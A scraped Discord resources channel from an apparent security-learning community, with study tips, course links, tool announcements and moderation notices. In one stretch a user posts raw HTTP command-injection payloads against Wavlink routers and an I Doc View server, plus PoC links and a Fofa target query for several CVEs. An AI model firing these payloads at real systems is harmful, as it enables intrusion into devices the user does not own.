We create a small Active Directory lab using VirtualBox and a Windows Server Standard evaluation. We'll configure it to act as a Domain Controller and set up ASREPRoast and Kerberoasting attacks step by step.

๐Ÿ’ก Key Highlights:

  • ๐Ÿ—๏ธ Setting up the Domain Controller with ease.
  • ๐Ÿ›ก๏ธ Exploring the ASREPRoast Attack and making a user vulnerable.
  • ๐Ÿ” Testing the ASREPRoast Attack to obtain password hashes.
  • ๐Ÿ•ต๏ธโ€โ™‚๏ธ Continuing with the Kerberoasting Attack and creating a vulnerable user.
  • ๐Ÿ”‘ Cracking hashes and gaining access.

๐ŸŽฅ Watch the full video for practical insights and hands-on experience. https://shorturl.at/quAD0
https://shorturl.at/MQX06

๐Ÿ“š Remember, "Build it before breaking!"

๐Ÿ”Ž Seeking the OSCP || ECPPTv2 Certification ๐Ÿ†Hey! Buy me a coffee โ˜• and support my quest to conquer these certifications. Your contribution will help me a ...

โ–ถ Play video

๐Ÿ”Ž Seeking the OSCP || ECPPTv2 Certification ๐Ÿ†Hey! Buy me a coffee โ˜• and support my quest to conquer these certifications. Your contribution will help me a ...

โ–ถ Play video
sterile estuary
#

Hello guys. Please can someon help with any comprehensive guide on threat modelling?

slate lynx
#

Throwing my cheat sheets here for others to utilize

#

Subnetting cheat sheet

#

Nmap cheat sheet (A bit long so discord scaled it down, apologies)

#

SOC Architecture map

scarlet yacht
#

The original video is from the 2012 Burnett Lecture located here. This is the very end of the 2nd vidoe right before the Q&A

http://learningcenter.unc.edu/ldadhd-services/burnett-seminars/dr-russell-barkley/

The playlist for the entire lecture and Q&A is located here
https://www.youtube.com/watch?v=NUQu-OPrzUc&list=PLzBixSjmbc8drDgzMj4GpPVLt7...

โ–ถ Play video
wicked tide
#
idle robin
chilly pier
#

Thought this might be a good place to ask - I just graduated from a cybersecurity bootcamp and tryhackme is something I consistently did the whole time. I want to start creating walkthroughs and writeups. Could anyone out there with experience recommend some tools they use to write theirs. Which platform? Medium seems to be popular. How do you insert code into the articles, is there a software you use? Where do you store your images / screenshots. Any input would be greatly appreciated!

unique crown
#
tepid patio
#

Hashnode is good as you own the domain, so you get SEO goodies and a nice domain. Medium is good as the audience is already there

acoustic acorn
tepid patio
#

Stephen King, one of the most beloved, famous and bestselling authors
ever, often goes to writerโ€™s conferences. After he talks for a little bit he
says, โ€œAny questions?โ€

Inevitably, someone raises their handโ€”Iโ€™m paraphrasing hereโ€”and says,
โ€œMr. King, you are one of the most beloved, famous, and bestselling
authors ever. What kind of pencil do you use to write your books?โ€ Itโ€™s
almost as if knowing what kind of pencil Stephen King uses will help
them be more like Stephen King

slate lynx
#

Hey, has anyone here used twingate before? If so, do you have any pros or cons or feed back? I'm thinking about using it for my personal network but I want to get the opinion of someone with experience

sonic abyss
grizzled moat
#

can anyone explain the php data wrapper for me

craggy onyx
#

Please engage with the community before posting/advertising links.

sonic abyss
#

Very descriptive methodology for web testing

tight kelp
#

Yeah that was a really good video

copper tangle
#

hello Folks, do you have any resources to start simple projects with the Rasperry PI?

narrow olive
#

Here is something to secure or pen-test your Linux endpoints - VPS/VPC/Desktop https://github.com/bgenev/impulse-xdr Provides host & network intrusion detection; tracking indicators of compromise, security posture monitoring, alerting and active response.

golden nova
hollow depot
#

CS50 just released this yesterday, its probably very basic but someone out here might enjoy it ๐Ÿ™‚

#

It starts oct 2nd

sonic abyss
#

Nice!

nova loom
#

Anything CS50 is a + in my books

#

I took it over the summer and now my uni courses are boring because I already know the stuff

acoustic acorn
#

CS50 is in general a very good resources! Tons of free qualitative courses!

sharp ginkgo
#

hey guys, does anyone know where to find labs on EDR evasion?

small mulch
prisma bison
#

@late comet please interact with the community before self promoting

wheat drum
#

Is there a zip file or similar I can download to have the same resources such as wordlists etc... that are available on the AttackBox ?

prisma bison
#

Please interact with the community before promoting your content ๐Ÿ™‚

sullen palm
#

malware related content isn't discussed, much less promoted outside of the advanced channels here

#

@hushed estuary

prisma bison
sullen palm
#

I'm just a member, not a mod or anything, but it'll be removed... as it just was, you can check the rules for how to get access to the advanced channels

shut ferry
#

My bad, I don't have access there.

odd sinewBOT
#

Gave +1 Rep to @sullen palm

prisma bison
#

For a reason ๐Ÿ˜‰

prisma bison
#

Please interact with the community before promoting your content here

digital lark
#

I was working on an LFI lab yesterday and just happen to see this post by @rich shore about LFI to RCE without log poisoning. Pretty cool, just checking the vid out now: https://www.youtube.com/watch?v=yq2rq50IMSQ

https://jh.live/fetchtheflag || Play my CTF that I'm co-hosting with Snyk this coming October 27! https://jh.live/fetchtheflag

Free Cybersecurity Education and Ethical Hacking
๐Ÿ”ฅYOUTUBE ALGORITHM โžก Like, Comment, & Subscribe!
๐Ÿ™SUPPORT THE CHANNEL โžก https://jh.live/patreon
๐Ÿค SPONSOR THE CHANNEL โžก https://jh.live/sponsor
๐ŸŒŽFOLLOW ME EVERYWHERE โžก h...

โ–ถ Play video
fringe spire
#

Please don't ping them

digital lark
prisma bison
odd sinewBOT
#

Gave +1 Rep to @digital lark

digital lark
peak bear
random peak
idle robin
#

a strong persistence tool for Linux

faint obsidian
#

Hello can someone point me in the right direction of building a malware file checker in python

oak island
#

Does anyone know of websites or places I can go to practice bash challenges or bash scripts? I really enjoyed all the rooms on THM.

hard solar
#

not sure if something is is like that. but you can build you bash scripts localy

oak island
#

Yeah I have been building some locally but kinda running out of ideas. I have been using Hackerrank as well.

hard solar
#

you can automate things you learn

tepid patio
#

imo this is a good video on exploiting CAP theorem (and eventual vs strong consistency) to steal $$$

https://www.youtube.com/watch?v=m4Fi_a9QATM

Play War Thunder now with my link, and get a massive, free bonus pack including vehicles, boosters and more: https://playwt.link/joeseppi

War Thunder is a highly detailed vehicle combat game containing over 2000 playable tanks, aircrafts and ships spanning over 100 years of development. Immerse yourself completely in dynamic battles with an unp...

โ–ถ Play video
outer oar
oak island
odd sinewBOT
#

Gave +1 Rep to @outer oar

idle robin
copper tangle
#

hello guy! How are you doing? I would like to ask if anyone can suggest tips and resources for the MS SC-200. Apart from books and the MS free material, do you know any good channel to learn by videos? For instance, I used to watch Savill's videos when I took the SC 900, but I noticed that he hasn't released any course for the SC 200. Thanks in advance!

jagged tiger
#

Isn't this like the 4th or 5th time we've had to tell you that self-promotion is frowned upon here?

swift scarab
normal brook
tropic moon
#

Hi! Any useful resources/videos to learn Android app development in Java?

golden shell
#

Hey Iโ€™m a bug hunter but most of my sites that I want to attack use APIs and I donโ€™t really know much on those. Anyone got some good tips or rooms for APIs and nginx

golden shell
#

Thank you

exotic schooner
#

Unlock the World of Ethical Hacking with Industry Experts at Techfest! ๐ŸŒ๐Ÿ”’ Join us for a hands-on workshop that will empower you to safeguard the digital realm. Secure your spot today!
Register now at -
techfest.org/hacking

Grab offer & get full access to all the events at Techfest, IIT Bombay.

idle robin
prisma bison
#

@karmic shore Hey, please keep it English

And please do not self promote or advertise here ๐Ÿ™‚

prisma bison
#

@shut ferry Hey, can you interact with the community a little more before posting your content? ๐Ÿ™‚

winged heart
#

Hey everyone, do you guys have any book or resource suggestions that can help me master active recon - from scanning to finding vulnerabilities?

quiet atlas
torpid wedge
#

Hey! Anybody with any necessary materials in preparation for CC ISC2 exam?

brave harbor
torpid wedge
brave harbor
#

I have a few friends who relied solely on the material from ISC2 with no issues.

#

You might find the solution or material suggestions you are looking for in the Certification Station discord.

rapid rock
#

ISC2 CC material is all I used to pass the exam, the key is to understand the concepts and how to apply to different scenarios.

prisma bison
#

@teal snow please interact with the community before self promoting :)

boreal snow
idle robin
sonic abyss
stuck abyss
sonic abyss
#

But had a look at some of them and looked pretty cool

#

Done a couple so far but will come back to it later

stuck abyss
#

They do.

sudden fern
#

have fun

shut ferry
#

FREE AI Resume builder (Pro Lifetime) Only valid for a couple more days.

nova flame
#

Does anyone know a source to a malware free version of immunity debugger?

nova flame
jagged tiger
#

Interesting talk about safe/secure coding in C++: https://www.youtube.com/watch?v=I8UvQKvOSSw

https://cppcon.org/
CppCon 2023 Early Access: https://cppcon.org/early-access
Access All 2023 Session Videos Ahead of Their Official Release To YouTube. At least 30 days exclusive access through the Early Access system. Videos will be released to the CppCon channel on a schedule of one video per business day, with initial releases starting in No...

โ–ถ Play video
shut crane
clever prism
#

I'm working on a tool https://github.com/NullRobot/Tooth-Fairy . ToothFairy.sh is a versatile tool designed to analyze and summarize data from network capture files and web content. For network captures, the script can extract and search for sensitive information such as email addresses, credit card numbers, passwords, file names, geolocation data, network shares, and more. ToothFairy.sh supports a variety of formats including pcap, pcapng, cap, snoop, netmon, and others.

I'd love any feedback. The web aspect of the script still needs a lot of improvement.

GitHub

Analyze and summarize data from network capture files and web content, such as credentials and PII. - GitHub - NullRobot/Tooth-Fairy: Analyze and summarize data from network capture files and web c...

stuck abyss
clever prism
#

Oh those are great ideas. @stuck abyss

odd sinewBOT
#

Gave +1 Rep to @sage heath

sonic abyss
#

cool project tho!

clever prism
odd sinewBOT
#

Gave +1 Rep to @sonic abyss

sonic abyss
nova loom
sonic abyss
#

pretty basic

nova loom
#

still gonna go over it in winter break to see if I'm missing anything with fundamentals

scarlet yacht
#

https://securityzines.com/
Interesting concept ๐Ÿค”

SecurityZines are new way of learning security concepts, check the collection of Zines down below. You can get them all in a bundle or individually. But why should you read it ? Because, its proven that graphics has more persistent memory than reading.

opal horizon
clever prism
opal horizon
#

I'll use it and try to mess with it and will help in whatever I can

late comet
golden nova
#

https://youtu.be/zA8guDqfv40?si=JGZsYiF6bLQwux1U

100+ AWS course enjoy ๐Ÿ˜‰

The AWS Cloud Project Bootcamp is a free comprehensive training program to equip you with the skills and knowledge to successfully design, build, and implement a cloud project.

https://aws.cloudprojectbootcamp.com

Developed by Andrew Brown.

00:00 Intro
07:10 Welcome to the FREE AWS Cloud Project Bootcamp
10:05 Create a GitHub Account
13:46 Se...

โ–ถ Play video
urban sail
past totem
hushed estuary
#

I mean it's technically possible

vocal hare
#

hey guys I really want to get good at forensics ctf any tips and resources?

stuck abyss
#

What sort of forensics, all?

Or do you want to specalise, in memory. network, cloud, etc?

digital lark
#

Ive been having fun doing the THM forensics rooms

digital lark
vocal hare
vocal hare
odd sinewBOT
#

Gave +1 Rep to @digital lark

digital lark
tepid patio
#
tepid patio
#

self promo of a discord bot of hacking tools some may find useful https://skerritt.blog/the-ultimate-discord-hacking-bot/

Skerritt.blog

The Ultimate Hacking Botโ„ข๏ธ contains a bunch of useful hacking tools:

  • LemmeKnow
  • Ares
  • Ciphey
  • Search-That-Hash

The GitHub Link is below:

GitHub - bee-san/discord-bot: Discord bot for Ares & Lemmeknow in the http://discord.skerritt.blog discord serverDiscord bot for Ares & Lemmeknow in the http://discord.skerritt.blog discord server

sonic abyss
#

Prepare for the AWS Certified Cloud Practitioner Certification (CLF-C02) and pass!

โœ๏ธ Developed by Andrew Brown of ExamPro
๐Ÿ”— https://twitter.com/andrewbrown

Get your Free Practice and Downloadable Cheatsheets
๐ŸŽ https://www.exampro.co/clf-c02

โญ๏ธ Course Contents โญ๏ธ
โ˜๏ธ 00:00:00 Introduction
โ˜๏ธ 00:46:02 Cloud Concepts
โ˜๏ธ 01:19:34 Getting Started
...

โ–ถ Play video
past totem
#

Hey folks!

I recently made a substack all about security, both on the developer side, and how you can protect yourself as an individual too. First post is a round up of my favourite low-cost privacy and security enhancement tools. Feel free to share these with family or friends or even use them yourself!

https://robertbabaev.substack.com/p/0x01-a-privacy-and-security-suite

Keeping safe in the modern world does not need to cost a lot.

prisma bison
#

Hey @fallow saffron, can you interact with the community before self promoting, please

fallow saffron
#

Could you tell me the person name to contact for promoting any article

prisma bison
#

With a side benefit of sharing knowledge related to information security.

fallow saffron
#

Yeah that's a good blog give it a try

bold fractalBOT
#
<#651923438524432404>
Rule 3 - No Advertising

No excessive self-promotion. While you're welcome to post your write-ups, walkthroughs, and streams of TryHackMe content, spamming of your own channels isn't tolerated.

fallow saffron
#

I have shared it in only one channel right

#

That too resources

versed spire
#

I'm not sure why the image isn't loading ๐Ÿ™

stuck abyss
#

The embed?

versed spire
#

Yep, it's fine though

sonic abyss
#

Well written!

versed spire
#

Thank you! Appreciate it

versed spire
#

Thank you!

bold fractalBOT
prisma bison
past totem
#

Right, thanks!

prisma bison
#

@river wave can you just provide the article link please

river wave
#

here you go sorry if it was the wrong one

prisma bison
#

the original article you linked to was about CVSS

#

You posted a weird link redirect instead of the link to the medium article

prisma bison
#

Mhm

river wave
sonic abyss
#

Here's a quick bash function I came up with for anyone wanting to easily share a terminal recording (using t-rec, filebin and copyq)

up() {
  local file_path=$1
  local file_name=$2
  local random_bytes=$(openssl rand -hex 16)

  curl -s -X 'POST' "https://filebin.net/$random_bytes/$file_name" \
       -H 'accept: application/json' \
       -H 'Content-Type: application/octet-stream' \
       --data-binary @"$file_path" > /dev/null
  copyq copy "https://filebin.net/$random_bytes/$file_name"
}

rec() {
    local timestamp=$(date +%s)
    t-rec -q
    up t-rec.gif terminal.gif
    mv t-rec.gif "/home/<user>/Pictures/Terminal/$timestamp.gif"
}

Automatically copies it to the clipboard

tepid patio
crisp sphinx
#

check out my project. any feedback is greatly appreciated.
it a cli tools that helps you with searching and printing gtfo, lolbas, tldr(man page but like cheatseet for commands), generating reverse shell, and print your notes directly on cli.
https://github.com/foreztgump/gibme

GitHub

gibme. Contribute to foreztgump/gibme development by creating an account on GitHub.

opal horizon
pine spade
prisma bison
#

@desert imp please interact with the community before self promoting

desert imp
#

where to self promote

bold fractalBOT
#
<#651923438524432404>
Rule 3 - No Advertising

No excessive self-promotion. While you're welcome to post your write-ups, walkthroughs, and streams of TryHackMe content, spamming of your own channels isn't tolerated.

tepid patio
#

Want to reshare an important blog post I wrote on making hacking accessible ๐Ÿ™‚ https://skerritt.blog/making-hacking-accessible/

Skerritt.blog

I hate the current state of hacking education, or of hacking tools. None of it is accessible to any minority.

In this post, I aim to distil some guidelines for making hacking accessible.

I am by no means an expert. I donโ€™t even work in A11Y. However, I do

brazen sequoia
#

Could you get back to me via DM pls once you see my message?

#

@vestal locust

stuck abyss
eternal creek
cobalt anchor
#

How much time does a tpm 9.0 take to disperse money?

#

Help anyone?

cobalt anchor
#

Urgent

#

Need help

eternal creek
#

sorry idk

shut ferry
#

Don't forget source after to reprocess init files from your home directory

And this is to make a symlink to /opt after you unpack your third party apps in it
https://askubuntu.com/questions/114721/symbolic-link-to-opt

cedar willow
#

in doing the splunk basics why is it I have to go to youtube to get advice on what to do next, there is so much information missing from the rooms instructions constantly, why? i.e. Select Source -> Where we select the Log source.
Select Source Type -> Select what type of logs are being ingested.
Input Settings ->Select the index where these logs will be dumped and hostName to be associated with the logs.......

#

The instructions dont tell you that you must create a new index for the VPN logs or that to upload the VPN logs you have to do it in the VM although your told to download the logs onto your PC etc

#

I wasted 45 mins trying to figure this out just to be able to move forward.

idle robin
bold fractalBOT
prisma bison
#

@lavish granite please interact with the community before self promoting

gloomy venture
#

Wavlink่ทฏ็”ฑๅ™จ่ฟœ็จ‹ๅ‘ฝไปคๆ‰ง่กŒ

POST /cgi-bin/mesh.cgi?page=upgrade&key=%27;id%3E%3Echeck.txt' HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

page=night_led&start_hour=;id;

URL /cgi-bin/check.txt

#

CVE-2023-30547 : VM2 Sandbox < 3.9.17 - Remote Code Execution

POC : https://github.com/rvizx/CVE-2023-30547

Analysis : https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244

GitHub

PoC Exploit for VM2 Sandbox Escape Vulnerability. Contribute to rvizx/CVE-2023-30547 development by creating an account on GitHub.

Gist

Sandbox Escape in vm2@3.9.16. GitHub Gist: instantly share code, notes, and snippets.

#
GitHub

CVE-2023-20198 Exploit PoC. Contribute to smokeintheshell/CVE-2023-20198 development by creating an account on GitHub.

GitHub

CVE-2023-20273 Exploit PoC. Contribute to smokeintheshell/CVE-2023-20273 development by creating an account on GitHub.

James Horseman

Introduction This post is a follow up to https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/. Previously, we explored the patch for CVE-2023-20273 and CVE-2023-20198 affecting Cisco IOS XE and identified some likely vectors an attacker might [โ€ฆ]

James Horseman

Cisco IOS XE CVE-2023-20198 technical deep-dive, WebUI internals, patch diffing, and exploit theory crafting.

#

๐’๐œ๐š๐ง๐Ÿ’๐š๐ฅ๐ฅ

Official repository vuls Scan: 15000+PoCs; 23 kinds of application password crack; 7000+Web fingerprints; 146 protocols and 90000+ rules Port scanning; Fuzz, HW, awesome BugBounty

https://github.com/GhostTroops/scan4all

GitHub

Official repository vuls Scan: 15000+PoCs; 23 kinds of application password crack; 7000+Web fingerprints; 146 protocols and 90000+ rules Port scanning; Fuzz, HW, awesome BugBounty( อกยฐ อœส– อกยฐ)... - ...

#

Artillery

CIA UAC bypass implementation that utilizes elevated COM object to write to System32 and an auto-elevated process to execute as administrator.

gloomy venture
gloomy venture
#

I Doc Viewๅœจ็บฟๆ–‡ๆกฃ้ข„่งˆ็ณป็ปŸ

POST /system/cmd.json HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: 127.0.0.1
Content-Length: 31
Expect: 100-continue
Connection: close

cmd=echo+%26+%28whoami%29+%26

#
GitHub

A public collection of POCs & Exploits for the vulnerabilities I discovered - jhftss/POC

Get arbitrary kernel code execution via an SIP-bypass primitive. It works on Intel Macs without the T2 Chip.

โ–ถ Play video
GitHub

Mickey's Blogs. Contribute to jhftss/jhftss.github.io development by creating an account on GitHub.

#

๐Ÿ–ฅCVE-2023-42793 : JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE

POC : https://github.com/H454NSec/CVE-2023-42793

Yaml : https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-42793.yaml

Fofa query: title="Log in to TeamCity" icon_hash="-1944119648"

GitHub

JetBrains TeamCity Authentication Bypass CVE-2023-42793 Exploit - GitHub - H454NSec/CVE-2023-42793: JetBrains TeamCity Authentication Bypass CVE-2023-42793 Exploit

GitHub

Community curated list of templates for the nuclei engine to find security vulnerabilities. - projectdiscovery/nuclei-templates

#

CVE-2023-2640 , CVE-2023-32629 : Ubuntu Linux Kernel - Local Privilege Escalation

POC : https://github.com/luanoliveira350/GameOverlayFS

POC2 : https://github.com/OllaPapito/gameoverlay

Blog : https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability

NIST : https://nvd.nist.gov/vuln/detail/CVE-2023-2640

โœ…TEST : Tested on Ubuntu 20.04 with kernel 5.4.0

GitHub

GameoverlayFS (CVE-2023-2640 and CVE-2023-32629) exploit in Shell Script tested on Ubuntu 20.04 Kernel 5.4.0 - GitHub - luanoliveira350/GameOverlayFS: GameoverlayFS (CVE-2023-2640 and CVE-2023-326...

GitHub

CVE-2023-2640 CVE-2023-32629. Contribute to OllaPapito/gameoverlay development by creating an account on GitHub.

wiz.io

Wiz Research discovers CVE-2023-2640 & CVE-2023-32629, 2 privilege escalation vulnerabilities in Ubuntu's OverlayFS module impacting 40% of cloud workloads.

steel plume
#
Medium

CVE-2022โ€“26923, commonly referred to as โ€˜Certifriedโ€™ is doing the rounds, and it really is a nasty vuln. I posted a video on LinkedIn lastโ€ฆ

Active Directory and Internal Pentest Cheatsheets

Microsoft Active Directory Certificate Services [AD CS]ย provides a platform for ... Read more...

sonic abyss
#

The new cloud+ certificate 4.0 from compTIA is in beta and you can get it for ยฃ36

#

Just search "Cloud" when ordering an exam

#

The current one is around $370 so would say it's a pretty good deal

short island
#

How long do they stay in beta?

brave harbor
short island
#

I havent got a single cert, not sure if i could do this in time

sudden fern
#

uh oh

#

shadow relies on rkhunter and paccheck to make sure they are not in a bad spot

#

this makes it seem trivial to defeat that security part

idle robin
#

bypass rkhunter is easy

#

because rkhunter is signature based...

#

so if you modify exactly functions where located in /var/log/rkhunter.log you can easy bypass rkhunter

snow gyro
#

any resources on evasion and asmx86-64?

#

asmi386 too

upbeat jackal
#

hey can anyone provide me a list containing everything useful, while providing me with learning pathway, for various Security jobs? (both red and blue teaming) as a complete beginner with quite a bit of knowledge of python, java, and c++ (i just know the very basics). I'm hoping it's free resources btw.

kindred shard
#

Walking An Application

Answer the questions below

What is the flag from the HTML comment?

What is the flag from the secret link?

What is the directory listing flag?

What is the framework flag?

sonic abyss
wispy mirage
eternal creek
#

I wrote some code for Asymmetric Key Exchange if anyone is interested in using it or would like to contribute:

main plume
#

Hi, do you know something similar to AWS Attacking and Defending Training that THM just launched?

brave harbor
main plume
#

Sorry for the missing part, i want something similar for learning Azure Security.

#

or general cloud

brave harbor
sonic abyss
#

Hey all, just wrote my first-ever blog post on one of my favourite security research findings. I would love to hear your thoughts and I hope that you can take something useful away from it!
https://skii.dev/rook-to-xss/

Skii.dev

Playing Chess is one of the many hobbies I like to do in my spare time, apart from tinkering around with technology. However, I'm not very good at it, and after losing many games, I decided to see if I could do something I'm much better at; hacking the system!

heady gust
odd sinewBOT
#

Gave +1 Rep to @sonic abyss (current: #13 - 466)

heady gust
#

impact through the roof

sonic abyss
odd sinewBOT
#

Gave +1 Rep to @heady gust (current: #1311 - 2)

versed spire
odd sinewBOT
#

Gave +1 Rep to @versed spire (current: #136 - 48)

nova loom
#

Any good resources for RISC-V assembly?

hushed estuary
versed spire
#

For sure

kind plaza
night ether
sonic abyss
night ether
vast dock
vast dock
regal sentinel
#

Curious if anyone knows of any internet facing networks that allow you to ingest their logs for research purposes?

I am working through the SC-200 course and want to ingest logs for analysis in my lab. (Yes I know I could just spin up vms and simulate traffic on them) Id just like to cut cost on compute resources.

vast dock
#

Hello, does anyone have good ressources to learn how migration between processes work ? (the migrate command in meterpreter)

lilac sundial
dusk anchor
idle robin
idle rain
stuck abyss
idle rain
#

Wow that is great to hear. their training is also not cheap

#

so the fact this is free is awesome

stuck abyss
light crystal
idle rain
#

Aw sorry to hear; maybe try a regular gmail anyway and see if you get it

heavy elmBOT
#

:hammer: escanor_pride007#0 has been banned.

sonic abyss
#

โญ I'm now offering one-on-one mentoring in development and video production
๐Ÿ”— Limited slots available - sign up here: https://www.patreon.com/coderized

๐Ÿ—ฃ๏ธ Discord is now available, come chat!
๐Ÿ”— https://discord.gg/Y7hEKnxPGf

๐Ÿ’œ Support the channel and get some nice perks:
๐Ÿ”— https://www.patreon.com/coderized


Containers are a game-changing...

โ–ถ Play video
prisma bison
#

Please interact with the community first.

#

This is your final warning @gusty mountain

willow loom
slate schooner
heavy elmBOT
elfin turret
sudden fern
#

Try Kasm Workspaces to stream any desktop, app or OS to your web browser:
https://kasmweb.com/community-edition
https://kasmweb.com/cloud-personal

Grab a brand new laptop or desktop running Linux: https://www.tuxedocomputers.com/en#

๐Ÿ‘ SUPPORT THE CHANNEL:
Get access to:

  • a Daily Linux News show
  • a weekly patroncast for more personal thought...
โ–ถ Play video
tepid patio
rose mango
#

anyone know good resource for manual web pentesting?

ripe adder
grand patrol
#

Do you know a good certification site for the cloud in general? I already have access to the Cisco platform, and Microsoft Azure but I would like something different ?

golden nova
fair fable
jagged tiger
#

Generally we don't let people just drop links to their own products without participating in the community.

junior mica
finite epoch
#

Anything for learning assembly?

ebon sphinx
#

@stuck abyss link from an inactive user. It's their only message.

stuck abyss
#

@lofty tree No self promotion please, interact more with the community first.

odd sinewBOT
#

Gave +1 Rep to @ebon sphinx (current: #145 - 47)

ebon sphinx
#

you're welcome

lofty tree
stuck abyss
ebon sphinx
#

based on your join date of thm I just assumed it was like that. Keep on reading blobfingerguns

lofty tree
lofty tree
lofty tree
rugged forum
#

Any resources for learning Go for scriptin ?

fair fable
odd quest
#

@ebon tapir Please interact with the community here before self promoting

#

@fair fable That's book piracy, please DO NOT do this here

tepid patio
stuck abyss
versed spire
#

are these secops courses any good? havent heard much about them online

stuck abyss
#

I'm not sure tbh, I'm sort of scepitcal as the with price drop.

shut ferry
versed spire
#

cool, keep us posted

dusk ginkgo
#

Hi, can anyone recommend any resources and/or THM rooms related to using ip route add. I'm trying to understand when to use this and why and I prefer practical examples to learn.

#

I found a few medium articles but still not 100% clear

smoky crater
fleet star
#

Ohh. Interesting

tepid patio
shut scarab
#

w

thick geyser
#

Hi! I'm currently looking for Ruby on Rails specific resources for finding vulnerabilities. I have looked at Rails 6, but I'm having trouble finding anything with Rails 7. I'm currently looking into the RailsGoat project by OWASP. Maybe there's some more resources or other communities you would recommend checking out?

austere marten
# thick geyser Hi! I'm currently looking for Ruby on Rails specific resources for finding vulne...

Greg Molnar wrote a good blog post about a code auditing checklist:
https://greg.molnar.io/blog/secure-code-review-checklist/
also there's the official Rails Security Guide:
https://guides.rubyonrails.org/security.html
and the OWASP Rails Security Guide:
https://cheatsheetseries.owasp.org/cheatsheets/Ruby_on_Rails_Cheat_Sheet.html
as for understanding what changed between Rails 6 -> 7, see the changelog:
https://edgeguides.rubyonrails.org/7_0_release_notes.html

odd sinewBOT
#

Gave +1 Rep to @austere marten (current: #299 - 16)

idle robin
stuck abyss
#

Please interact more before self promotion

steel plume
signal harbor
prisma bison
#

Please interact with the community before self promoting here

golden nova
#

You guys have to check this out

toxic marsh
bronze geyser
#

whatโ€™s the best resource that helped you master IDOR vulnerability?

balmy merlin
sonic abyss
sonic abyss
#

CompTIA PenTest+ Beta Exam is now available to book for an absolute steal (ยฃ36 compared to the usual ~ยฃ300).
Same with the new SecurityX cert (formerly known as CASP).

You can find them here: https://wsr.pearsonvue.com/testtaker/registration/SelectExamPage/COMPTIA/250068
And information about the new SecX: https://www.comptia.org/certifications/comptia-advanced-security-practitioner

Deadline for PenTest+ is 6 aug. Deadline for SecX is 23 July.

nova loom
#

Read this after my architectures class and it was amazing how everything connected: https://cpu.land/

Putting the "You" in CPU

Curious exactly what happens when you run a program on your computer? Learn how multiprocessing works, what system calls really are, how computers manage memory with hardware interrupts, and how Linux loads executables.

sonic abyss
#

cool stuff

hushed estuary
whole imp
whole imp
sonic abyss
#

https://hackclub.com/arcade/
I Know a lot of young people are here, something for you to do over the summer (tinkering around AND getting free stuff!)

Hack Club

The ultimate summer hackathon for high schoolers. Make projects. Track your hours. Redeem for Prizes.

glossy flax
#

The International Monetary Fund on how governments should/could deal with the proliferation of AI

A critical distinction between gen AI and past disruptive technologies (such as the steam engine, electricity, and early computers) lies in its potential for rapid diffusion. The sheer scale and speed of the transformation pose risks to labor markets. While automation and robots have already displaced low- and middle-skill jobs involving routine tasks, gen AIโ€™s capabilities extend to more intelligent automation, potentially amplifying job losses in cognitive occupations. Consequently, the labor income share in national income may further decline, exacerbating income and wealth inequality. Dominant firms in increasingly concentrated markets could reinforce their market power and enjoy monopoly rents. This note provides analysis and guidance for policymakers as they prepare for the transformative impact of gen AI.
https://www.imf.org/en/Publications/Staff-Discussion-Notes/Issues/2024/06/11/Broadening-the-Gains-from-Generative-AI-The-Role-of-Fiscal-Policies-549639

nova loom
quaint sand
#

anyone could recommend some good reverse engineering resources like free Books, online courses, or tutorials. Thanks in advance!

quaint sand
odd sinewBOT
#

Gave +1 Rep to @ripe adder (current: #1401 - 2)

sonic abyss
sonic abyss
drifting citrus
ruby needle
flint drum
stuck crag
odd sinewBOT
#

Gave +1 Rep to @stuck crag (current: #1409 - 2)

stuck abyss
prisma bison
#

Hey @idle robin that isn't really a resource ๐Ÿ˜„

prisma bison
#

@ruby needle ?

leaden willow
#

๐Ÿ‘

sonic abyss
kind plaza
golden nova
ruby needle
stuck abyss
tepid patio
sonic abyss
#

WHOOO

shut ferry
#

by Jacob

JUL 24, 2024
65 MIN READ

#

Ah yeah

sonic abyss
#

There was a lot to cover ๐Ÿ˜†

#

It's not really 65 minutes

thin crypt
crystal patrol
idle robin
#

C2 servers of mobile and Windows malware are usually left to their own fate after they have been discovered and the malware is no longer effective. We are going to take a deep dive into the rabbit hole of attacking and owning C2 servers, exposing details about their infrastructure, code bases, and the identity of the companies and individuals th...

โ–ถ Play video
icy bobcat
icy bobcat
#

Can someone explain

#

This article

prisma bison
#

@icy bobcat is this your article..?

icy bobcat
prisma bison
icy bobcat
#

Buddy its a free site you can write your articles there just dm the admin on Twitter

#

I posted some on them that doesn't mean it's my site

prisma bison
icy bobcat
#

Am I advertising rn

#

I have a legit question that does anyone knows anything about Bluetooth hacking what the article says

#

Chill mate

prisma bison
#

If you post that website again you will be banned for continuously advertising without interacting with the community.

icy bobcat
#

Haha

heavy elmBOT
#

@icy bobcat has been warned.

icy bobcat
#

Atleast i have higher rank tha you

prisma bison
#

Hey @keen pagoda can you interact with the community more before self promoting please

tropic timber
#

So I've been doing some prompt engineering on LLMs for lakera ai's gandalf box. Anyone have resources I can read to learn more techniques and strategies? I'm stuck but I don't want just a hint, I wanna do my own research and really learn / develop this skill set.

nova loom
tropic timber
#

Ty

onyx rapids
#

This may have already been mentioned (and may only be for those of us in the US) https://www.gale.com/public You may have access to many courses through your local libraries. For example, I have access to all of linkedin learning, UDEMY Business, and many other resources that my local public libraries provide.

Gale's library solutions and resources can help your public library with collection development, databases, and more. Click to explore.

stuck abyss
vivid zealot
#

I have a question that I should have posted in this resource channel.
In the SOC level 1 path there is a room called TEMPEST that is in the capstone challenges at the end of the learning path.
There is a tool used in the attached VM called SysmonView.I want to find and download this tool on my personal computer so I can practice.
I clicked on a link provided in the room that goes to Eric Zimmerman's github page but SysmonView is not listed there.
I've searched the web for a place to download SysmonView with no luck.
